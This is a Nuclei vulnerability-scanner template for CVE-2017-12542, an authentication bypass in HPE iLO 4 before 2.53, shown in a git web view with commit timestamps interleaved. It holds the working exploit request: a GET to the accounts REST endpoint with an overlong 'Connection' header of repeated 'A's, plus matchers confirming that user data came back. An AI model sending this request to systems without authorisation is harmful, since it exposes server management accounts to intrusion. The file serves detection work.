nuclei-templates/cves/2017/CVE-2017-12542.yaml

44 lines
1.1 KiB
YAML
Raw Normal View History

2021-03-23 11:26:08 +00:00
id: CVE-2017-12542
info:
name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass
2021-03-23 11:26:08 +00:00
author: pikpikcu
severity: critical
description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.
reference:
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
- https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
- https://www.exploit-db.com/exploits/44005/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-12542
tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
2021-03-23 11:26:08 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/rest/v1/AccountService/Accounts"
2021-03-23 11:26:08 +00:00
headers:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
matchers-condition: and
matchers:
- type: word
part: body
2021-03-23 11:26:08 +00:00
words:
- "iLO User"
2021-04-17 15:48:58 +00:00
- type: word
part: header
2021-04-17 15:48:58 +00:00
words:
- "application/json"
2021-03-23 11:26:08 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/11